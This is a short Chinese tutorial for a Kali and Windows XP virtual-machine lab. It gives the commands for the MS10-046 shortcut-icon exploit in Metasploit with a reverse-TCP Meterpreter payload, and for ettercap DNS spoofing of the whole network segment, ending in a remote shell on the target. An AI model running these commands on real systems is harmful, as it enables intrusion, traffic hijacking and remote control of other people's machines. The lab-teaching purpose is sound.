环境,kali虚拟机和winXP虚拟机
XP虚拟机别打太多补丁,毕竟为了试验
首先,两台电脑都打开
接下来,对kali进行操作
首先查看ip和网卡
指令ifconfig
接着打开Metasploit命令行模式
指令msfconsole
选择漏洞利用攻击模块
use exploit/windows/browser/ms10_046_shortcut_icon_dllloader
然后配置攻击的参数
设置SRVHOST
set SRVHOST kali的ip
选择攻击载荷反弹ip模式
set PAYLOAD windows/meterpreter/reverse_tcp
设置LHOST
set LHOST kali的ip
通过exploit命令发起攻击
配置ettercap工具进行dns欺骗
编辑etter.dns
vim /etc/ettercap/etter.dns
注意 BT5和kali的etter位置不同,用bt5的请自行百度
添加A记录,如,使.com的域名全部被劫持
*.com A kali的ip
接下来就可以开始欺骗攻击了
ettercap -T -i 网卡编号 -q –P dns_spoof /// ///
这是对全网段进行欺骗
此时,xp虚拟机ping任何一个.com域名时,ping的ip都会变成kali的ip
当kali的msfconsole中显示Meterpreter session 1 opened时,说明已经攻击成功
此时可以输入sessions指令查看被攻击的主机
通过指令sessions –i 主机id号,可以对主机进行操作,比如输入shell指令,就可以通过shell控制目标机